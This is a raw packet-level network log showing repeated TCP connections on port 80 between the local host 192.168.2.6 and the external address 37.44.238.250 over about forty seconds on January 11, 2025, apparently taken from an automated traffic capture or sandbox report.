                                                                                  Jan 11, 2025 06:43:28.173955917 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.525475979 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.530287027 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.530426025 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.891774893 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.906416893 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.911608934 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:28.911777973 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.911962032 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:28.916809082 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.039328098 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.039654970 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:29.040024996 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:29.045115948 CET805697337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.045335054 CET5697380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:29.270168066 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:29.277925968 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.277942896 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.277951956 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.602412939 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.732094049 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:29.732162952 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.076097012 CET5696180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.141444921 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.142393112 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.146456003 CET805697537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.146507978 CET5697580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.147145033 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.147222042 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.147370100 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.152199030 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.645123959 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:30.650054932 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.650075912 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.650087118 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.775299072 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.903352022 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:30.903529882 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.189981937 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.190793037 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.194911957 CET805698237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.194962978 CET5698280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.195601940 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.195668936 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.195831060 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.200572014 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.565469027 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:31.570405960 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.570440054 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.570450068 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.843065023 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.974092007 CET805698837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:31.974174976 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.225260973 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.230216026 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.230304956 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.230444908 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.235275984 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.582953930 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.583153963 CET5698880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:32.587810040 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.587850094 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.587861061 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:32.890387058 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.023919106 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.023993015 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.182467937 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.186134100 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.187482119 CET805699037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.187541962 CET5699080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.191010952 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.191082954 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.191212893 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.196046114 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.535810947 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:33.540707111 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.540723085 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.540787935 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.820041895 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.985991955 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:33.986052990 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.052506924 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.053000927 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.057531118 CET805699637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.057605028 CET5699680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.057873964 CET805700237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.057952881 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.058068991 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.063487053 CET805700237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.206667900 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.209285021 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.214112997 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.214241982 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.214401007 CET5700780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:34.219350100 CET805700737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.251605034 CET805700237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.508821964 CET805700237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:34.508909941 CET5700280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.975647926 CET5706180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.044574022 CET805706137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.129518032 CET5706180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.184412003 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.189368963 CET805706337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.189523935 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.189635992 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.194422960 CET805706337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.271071911 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.271770000 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.277129889 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.277247906 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.277412891 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.282239914 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.319720030 CET805706337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.397488117 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.402337074 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.402414083 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.402563095 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.407464027 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.629692078 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.634628057 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.634701014 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.656260967 CET805706337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.656333923 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.754600048 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.759591103 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.759608984 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.759623051 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.925116062 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.973382950 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.037838936 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.058109999 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.082613945 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.098232985 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.166389942 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.207593918 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.284425974 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.284497023 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.285465002 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.289423943 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.289484024 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.289727926 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.289772987 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.290268898 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.290321112 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.290443897 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.295222998 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.681310892 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.686253071 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.686294079 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.686322927 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.927762032 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.973236084 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.064291954 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.113924980 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.190772057 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.191590071 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.195807934 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.196098089 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.196469069 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.196563959 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.196674109 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.201503038 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.551577091 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.556567907 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.556586027 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.556595087 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.844347954 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.895112038 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.978204966 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.020140886 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.106992960 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.108280897 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.112179041 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.112237930 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.113095999 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.113171101 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.113392115 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.118263006 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.457885027 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.463074923 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.463145018 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.463182926 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.741918087 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.785840034 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.874331951 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.926368952 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.024524927 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.029531002 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.033550024 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.044943094 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.049742937 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.053554058 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.068737030 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.073623896 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.443443060 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.448513985 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.448527098 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.448537111 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.681979895 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.723274946 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.846643925 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.895133972 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.979525089 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.980341911 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.984602928 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.984666109 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.985176086 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.985256910 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.985371113 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.990187883 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.333055973 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.337944984 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.337960005 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.337965012 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.617538929 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.660859108 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.747021914 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.801352024 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.883872032 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.884687901 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.888883114 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.889122009 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.889579058 CET805707137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.889647961 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.889760017 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.894490957 CET805707137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.079408884 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.082178116 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.084248066 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.084330082 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.084434986 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.089226007 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.127635956 CET805707137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.209419012 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.214416027 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.214634895 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.215289116 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.220109940 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.334690094 CET805707137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.335453033 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.442106009 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.447088957 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.447160959 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.567225933 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.572144985 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.572163105 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.572173119 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.712759972 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.754511118 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.842292070 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.853636980 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.895128965 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.895133972 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.984355927 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.035756111 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.206871986 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.207020998 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.212306976 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.212431908 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.212502003 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.212534904 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.214302063 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.219335079 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.219430923 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.219702959 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.226299047 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.567353964 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.572242022 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.572257996 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.572280884 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.855947971 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.910778046 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.988027096 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:52.035765886 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.115012884 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.116060972 CET5707580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.120145082 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:52.120204926 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.120898962 CET805707537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:52.120976925 CET5707580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.121082067 CET5707580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.126205921 CET805707537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:52.473582029 CET5707580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.478532076 CET805707537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:52.478545904 CET805707537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:05.388629913 CET805709237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:05.442054987 CET5709280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:05.560369968 CET805709237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:05.613897085 CET5709280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:05.693502903 CET5709280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:05.694327116 CET5709380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:05.698785067 CET805709237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:05.698837042 CET5709280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:05.699120045 CET805709337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:05.699179888 CET5709380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:05.699287891 CET5709380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:05.704098940 CET805709337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.054738998 CET5709380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:06.059709072 CET805709337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.059725046 CET805709337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.059734106 CET805709337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.348607063 CET805709337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.395435095 CET5709380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:06.482558966 CET805709337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.537558079 CET5709380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:06.614717007 CET5709480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:06.614717007 CET5709380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:06.619704008 CET805709437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.619857073 CET805709337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.619956017 CET5709480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:06.619959116 CET5709380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:06.620104074 CET5709480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:06.624912977 CET805709437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.973567963 CET5709480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:06.978534937 CET805709437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.978554010 CET805709437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:06.978564978 CET805709437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:07.269201994 CET805709437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:07.332721949 CET5709480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:07.446542978 CET805709437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:07.464706898 CET5709580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:07.469654083 CET805709537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:07.473603010 CET5709580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:07.474689960 CET5709580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:07.479513884 CET805709537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:07.504571915 CET5709480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:07.577869892 CET5709680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:07.582771063 CET805709637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:07.582847118 CET5709680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:07.583159924 CET5709680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:07.587997913 CET805709637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:44:07.832870007 CET5709580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:44:07.837970018 CET805709537.44.238.250192.168.2.6
